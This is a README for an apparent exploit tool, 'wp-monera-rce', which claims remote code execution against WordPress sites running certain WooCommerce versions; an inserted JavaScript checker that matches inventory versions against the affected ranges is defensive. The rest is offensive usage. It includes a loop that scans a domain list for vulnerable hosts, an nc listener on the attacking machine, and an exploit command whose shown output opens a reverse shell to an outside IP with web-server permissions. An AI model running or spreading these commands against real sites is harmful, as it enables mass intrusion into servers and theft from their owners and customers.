# wp-monera-rce

An RCE in WordPress 5.9, 6.0 and 6.2 with the WooCommerce plugin installed in versions 7.8.2 to 8.3.0 has been found using the technique of machine learning-based fuzzing (see references). We called the exploit monera.
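For patch management it is useful to turn the version ranges stated above into a check that runs against an inventory you already hold, without touching any host. The following is an added example and not part of the wp-monera-rce tool; it encodes exactly the ranges named in this README (WooCommerce 7.8.2 to 8.3.0 inclusive, WordPress 5.9, 6.0 and 6.2 read as major.minor matches), and the inventory records and hostnames are constructed sample data.

```javascript
// Added example, not code from the wp-monera-rce repository. It classifies
// inventory records by the version ranges this README states as affected and
// performs no network access.

// Ranges as stated in the README (assumption: boundaries are inclusive).
const WC_AFFECTED_MIN = "7.8.2";
const WC_AFFECTED_MAX = "8.3.0";
// WordPress releases named as affected, compared on major.minor only.
const WP_AFFECTED_MINOR = new Set(["5.9", "6.0", "6.2"]);

// Parse "7.8.3", "6.2" or "7.8.3-beta1" into [major, minor, patch].
// Missing components default to 0; unparseable input yields null.
function parseVersion(str) {
  const m = /^v?(\d+)(?:\.(\d+))?(?:\.(\d+))?(?:[-+].*)?$/.exec(String(str).trim());
  if (!m) return null;
  return [Number(m[1]), Number(m[2] ?? 0), Number(m[3] ?? 0)];
}

// Component-wise numeric comparison: -1, 0 or 1. A plain string compare would
// wrongly place 7.10.0 before 7.8.3, which matters for range checks.
function compareVersions(a, b) {
  const pa = parseVersion(a);
  const pb = parseVersion(b);
  if (!pa || !pb) throw new TypeError(`unparseable version: ${pa ? b : a}`);
  for (let i = 0; i < 3; i++) {
    if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  }
  return 0;
}

// True when a WooCommerce version lies inside the stated affected range.
function wooCommerceAffected(wcVersion) {
  return compareVersions(wcVersion, WC_AFFECTED_MIN) >= 0 &&
         compareVersions(wcVersion, WC_AFFECTED_MAX) <= 0;
}

// True when the WordPress major.minor is one of the releases named above.
function wordPressAffected(wpVersion) {
  const p = parseVersion(wpVersion);
  if (!p) throw new TypeError(`unparseable version: ${wpVersion}`);
  return WP_AFFECTED_MINOR.has(`${p[0]}.${p[1]}`);
}

// Assess one inventory record. wcVersion is null when the plugin is absent.
function assessSite(site) {
  if (site.wcVersion == null) {
    return { host: site.host, status: "not-affected", reason: "WooCommerce not installed" };
  }
  const wp = wordPressAffected(site.wpVersion);
  const wc = wooCommerceAffected(site.wcVersion);
  if (wp && wc) {
    return {
      host: site.host,
      status: "affected",
      reason: `WordPress ${site.wpVersion} with WooCommerce ${site.wcVersion} matches the stated ranges`,
    };
  }
  const why = !wp ? `WordPress ${site.wpVersion} not in the stated releases`
                  : `WooCommerce ${site.wcVersion} outside ${WC_AFFECTED_MIN}..${WC_AFFECTED_MAX}`;
  return { host: site.host, status: "not-affected", reason: why };
}

function assessInventory(inventory) {
  return inventory.map(assessSite);
}

// Constructed sample inventory (hostnames and versions are made up).
const SAMPLE_INVENTORY = [
  { host: "shop.example.test",  wpVersion: "6.2.1", wcVersion: "7.8.3" },
  { host: "blog.example.test",  wpVersion: "6.2",   wcVersion: null },
  { host: "store.example.test", wpVersion: "6.0.3", wcVersion: "8.3.1" },
  { host: "old.example.test",   wpVersion: "6.1.1", wcVersion: "7.10.0" },
];

for (const r of assessInventory(SAMPLE_INVENTORY)) {
  console.log(`${r.host}: ${r.status} (${r.reason})`);
}
```

Feed it the WordPress and WooCommerce versions your own asset inventory already records and prioritise the `affected` entries for patching; the two `throw`s surface malformed version strings instead of silently treating them as safe.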
## POC

### Test for vulnerability

Non-vulnerable host:

```text
node src/wp-monera-rce.js --dry --target https://example1.com
checking...
woocommerce plugin is not installed, not vulnerable, bye
```

Vulnerable host:

```text
node src/wp-monera-rce.js --dry --target https://example2.com
checking...
woocommerce v 7.8.3 is found, vulnerable, bye
```
### Run in batch

You can run the script in a loop to find all vulnerable targets:

```shell
while read -r line; do
  node src/wp-monera-rce.js --dry --silent --target "$line"
done < domains.txt
```

This will echo all vulnerable hosts from the list.
### Exploit

Open a listening port on your attacking machine:

```shell
nc -l 10000
```

and run the exploit with:

```text
node src/wp-monera-rce.js --wet --to $my_attacking_host_ip:$my_attacking_host_port --target https://example2.com
checking...
woocommerce v 7.8.3 is found, vulnerable
creating remote shell to 51.19.23.2:10000...
connection established successfully
```

You are supposed to get a remote shell on the nc connection with web server permissions (apache or nginx, whatever runs WordPress).
## Run

### Prerequisites

nodejs is required to be installed on the system.

### Clone

```shell
git clone git@bitbucket.org:0xsky/wp-monera-rce.git
cd wp-monera-rce
npm install
node src/wp-monera-rce.js --version
```
## References

- “Fuzzing-based hard-label black-box attacks against machine learning models”, https://doi.org/10.1016/j.cose.2022.102694
- “Detecting prototype pollution for node.js: Vulnerability review and new fuzzing inputs”, https://doi.org/10.1016/j.cose.2023.103625
- “An Abstract Syntax Tree based static fuzzing mutation for vulnerability evolution analysis”, https://doi.org/10.1016/j.infsof.2023.107194
- “A systematic review of fuzzing techniques”, https://doi.org/10.1016/j.cose.2018.02.002